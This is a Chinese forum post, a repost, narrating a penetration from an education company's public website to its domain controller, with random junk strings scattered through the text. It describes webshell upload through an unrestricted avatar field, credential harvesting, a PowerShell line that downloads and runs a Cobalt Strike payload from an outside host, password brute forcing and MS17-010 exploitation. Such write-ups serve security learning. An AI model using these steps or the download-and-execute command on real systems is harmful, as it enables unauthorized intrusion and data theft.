找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3142|回复: 0
打印 上一主题 下一主题

渗透实战 | 从外网直接打到内网全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2024-3-1 19:41:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

, G( i2 N+ \3 C1 _1 R 这次渗透是一个从01,从外网到拿下域控的实战过程,希望可以给大家一些思路 " `+ ]4 s; }! K+ U% f

" L2 R1 ~/ m5 P

) w4 y- E$ w. ?8 [' r7 u* @  " D( _) W: Q" ` b' z/ R

+ Q" r s. S, Z2 ?

" W4 p. \# k; Q7 ]1 E1 g, q+ w' s" Y 正文, p" {) ]- O3 |+ @& }3 H' i" ^ a

9 \9 Z4 H* ~, p1 e- X# u

: O$ c: ~' H$ |& G7 K  & G) Z) P5 y5 c2 f$ C% i: T1 ~

3 L9 K2 E& D7 {0 E# V0 g

: a, u, p" t- s- L 目标:www.xxxx.com(一家教育机构)
# D1 I) A+ i3 {8 E# x, [
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
, Q7 X5 V y6 [: ^1 V# k

7 i, h0 t# U7 ?

* n1 k6 ?/ x( a. g' o6 d0 w vshapes= 0 k- d: P- H P! ^7 \4 k) P# w

5 Q! c; U, A& q4 c+ x

- ^3 I7 a, E4 n- ?' X 进行了简单的信息搜集
5 R/ |2 [% v, B
" v; u3 Z7 l3 P+ J; u
0 J! p0 t5 i9 J' v- m3 |

5 G- e: H& W( w' s: G1 Q: D

' e5 m9 g/ S: p; i 子域名搜集1 ]2 u3 h6 L) K8 P# V8 U

8 L% j5 e( m" o7 S1 T; R

+ M) z) O1 f( v' w1 c vshapes= % b* y) X3 R3 x) ]+ J" I+ v

+ p3 I0 h' S+ ^. {" E

+ j" G. L* n2 J fofa找资产
( k: T) C2 I: Z- G/ m
: d/ Y# d9 F% s
' I' d; N3 H" U7 o: W' s8 X5 k

* K! l# P" z! j. Q) w H

* M: F0 j! `3 V2 @# c' F) L: z vshapes= 6 {$ s2 S- z& x" o

# c, y+ m4 K2 h3 f! T

% y* ~' Z5 a' _ 一共七个资产。去重之后只有两个。
: i! Z3 |- x3 H0 @
5 g3 i8 H) w: \: T
1 b6 T( }4 Z, _7 q

0 d" z* m2 R0 n- N

" H, v" \: T: f 目录探测; r! K/ H# P7 @3 p$ L! j; E

- S" v/ S: V' {: m1 i: t( y

7 l9 ], E2 A$ ? ~; H vshapes= " q b; Q3 w) C

" ?) ~! N- N; v8 e

# i1 A; C+ @3 R3 _0 h 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
# o: n4 z3 A$ U" p0 m/ |$ {. D
* q2 V/ p8 ]0 a6 ~- T
2 J, t& T/ J; X8 Q2 {

/ `) C: t9 \) t( p2 R

( C7 F6 v0 w W2 j7 k 我又尝试了通过修改返回包来绕过登录界面 ' }9 ` A/ [" k* D4 }1 A$ m

/ G8 W' o# b- X' a! y

( v D! S! ^4 Z( f; d- s vshapes= ( G& n8 t5 U. J

, H+ a! z1 A' n" V* f

0 C0 \2 E) g! E, z5 c1 I 还是不行,尝试注入无果 ; [9 [3 e; q9 C1 x, S2 U

+ h8 N7 w% C" M/ ^4 e, w

6 O+ S8 s" c) h$ h* O+ a8 Z% n vshapes=, _; ^0 `1 \5 d

+ V# \5 B/ N$ i/ b" n" e% F+ J

5 V2 `+ }- ~; W6 \+ i 不过我目录探测出了一处Spring信息泄露
9 T+ k6 f8 }" ^: G" M' Q
2 C2 x) f, k+ ~8 V; n: t
7 J+ V* L' K m" L. _

* \. f* c5 T; o8 s) V4 t I

) r' y& @! A5 i2 h+ u% j vshapes= * X0 o+ s* ~$ J, h$ Z9 V. v

6 L `, ~ m: s& v& P

5 E4 s3 d1 T* m9 M 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录 M/ I7 Q( {' d& l4 N8 a+ B

, @9 \2 [2 j7 _; Q# `8 E3 S

! [+ t" u* N/ G" f, O vshapes=+ U" u; h8 d2 q8 X2 C" z$ ?& n; O

, `' C7 p# S6 Z

# E' z: I/ l& N* P9 _ v5 M 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。 5 O j5 I8 o$ x1 F5 u7 Z

/ R' h4 `8 y9 I6 l

+ n+ n( J/ W$ t1 N vshapes= 0 U2 o. ?8 n' {

6 ~* [8 ?& M7 |

3 H. a+ w6 V- d 获取有些师傅到这一步就手机抓包电脑测了。) ]/ ?, F3 T9 Y

2 ?, ^% q1 ^# A" h: {

: e. p/ d6 `$ q Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。. b3 B# [: D- M Z& ~

1 q0 |" L! ^9 ~$ V' n

' |4 u6 x2 ]% T4 ] 其中在一个公众号发现了小程序,可以进行注册。 @% C/ u8 H1 @8 p% {% j

1 y; I" O2 M- _1 x: T4 X. D- r

% K$ R- L6 j" V/ z! o: t! L 看到了头像上传,尝试上传获取WebShell 2 @6 ~( \) o" [2 O8 z

+ c3 V+ j6 _# H/ [. M, P3 p

( h# K! g9 T$ P vshapes=: @7 }3 u" y7 a) t

: }9 F. Z2 v! t v

, G7 h* a- b/ r 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问7 a8 B( [1 R o# I

0 \3 B. O8 Z* x' F- o0 l

- I- q R0 Z8 d \# A8 U vshapes=. @( W! Y) v" a! V

- v8 v" ?$ v5 Q6 W

z: T* s0 ^ q& V 然后上了大马 ! m2 Y$ p5 l% p- f0 z4 l

: g9 p' c2 Y9 b& }6 R' `" Z

8 Q/ _+ I- B9 |' @, ^0 r1 U vshapes=) D1 q' e, @" `+ [) S

' ]& d$ ]$ t9 I1 }; X% q& O

7 Z' r/ l# s2 ~; l vshapes= + r) g6 c" F( V0 V

- K. `/ ]- N9 r4 N# q

- C* R7 x. u4 J- s1 z6 A) R 通过翻找文件发现数据库账号密码 ( O+ s+ B: j# l# K* d

* }: o$ b+ {6 l% i

2 i* t& G4 f r' _+ O vshapes=. e. u" l- C# e

% Y0 I* N/ n+ T. ^6 C

1 w( i/ u# m* U" V" D( t --内网渗透( f# P7 c( y s4 U1 e

1 o9 i# ?* D5 v4 }0 ]

! T8 P6 G B2 N! G2 G' N4 I( { 直接通过powershell执行 cs上线8 F3 x2 O8 V, M w% p

/ e* A% `, |( d

6 M8 `; z: O! i- y5 p6 R2 j powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))" ) n" _) C) h; A

- Q2 ^& b0 I0 n1 i% F1 O5 o

4 E1 j. n D/ q2 W9 n7 W2 t5 n6 m vshapes=, f: p% \8 y. a2 k% O; k% l

% D) Y, L, }- T% H' Y

0 ]# C# h$ W2 Z 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破 / j4 P; N# i- a1 v7 y$ a

( \5 Z+ b. q) Z4 [% o

4 M- S2 I* o0 K2 W vshapes= - b, [0 }3 W% d0 }

$ O. a4 Y9 p# z5 |+ D: w9 n9 _! B

8 N7 P/ F6 F0 N6 U 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
7 Y. h! p! t; T% E
1 k& _# c& E; x, t! r8 B$ x! M
: f' n. e1 b6 Y
( O$ U4 Y3 q" q. C8 S' U

- D( _3 c. Q6 I, u7 K4 w

# w' u- ?- P$ k& `( _0 r. f vshapes=9 y5 I6 m. j5 u' k4 y

9 j! c6 s1 m- y7 B

7 o/ W) E5 K5 f8 l, b 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
% W) G8 s) ]+ b- Q
, R, w9 ~; ~1 ]$ n v
8 q# Z+ {% b% J. U8 Z

- e2 A7 e! l3 T4 _& M

7 L/ h* v) D; h vshapes= + ~" y1 d6 Y3 q$ g: X$ ^8 g3 c1 p

! s4 T, |9 x' A' l. x; q# z

/ H5 T6 @1 c4 o: i
/ p6 x# T7 n$ u2 _- C
% b9 `: Q* F A& m7 o
+ p, z2 s4 B) ?8 m( `4 U B

" H7 ~9 y @ `4 O& ~

8 X8 r$ T6 P+ Z9 Y; r. P  # J$ }" \! N- A+ W( [- V; ?4 b

4 E9 o+ e& K7 b* a; n: P

! ~2 Y) ^2 w0 [ S3 s9 [4 M 小结 / X1 G5 ?, D# K+ |: `

& Z; Z* q* L# w" ~" E, y

4 x, x6 j, Q9 p W" a  4 ] g% o: c7 N0 Y! { z

& f) S. i" q, e, y" B

( X5 ~/ E7 b! c 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路! " d: Q' W1 Y$ T2 `

6 n& F/ K0 m6 s# P

0 x( R+ N: a" v/ E% w6 S   1 W+ K! ^. L# b' w- r

+ _' [ T! c% d1 I4 y
    2 G- V4 p- f$ q& s5 ]5 [% i; `3 E
  • 9 ?. m. C* E+ o4 B0 {  + a. O- C! J* z1 O' Z: ?
  • 6 t y/ Q6 X- Z+ G P5 H; Z
  • 4 V; I C9 K2 U   + k2 Z- g- ^8 c+ p
  • . h& s; r" Q, k
6 n/ T) @/ d( h1 ^- R3 a1 \

* K3 A% u4 g9 I1 K8 K y 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html6 a M' g. T! C1 u

; Z R3 k' r: E. l. ?6 V0 I

/ d& Y+ V- n# }0 K& f4 H- g+ p  2 E5 m, N. ]# p: A

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表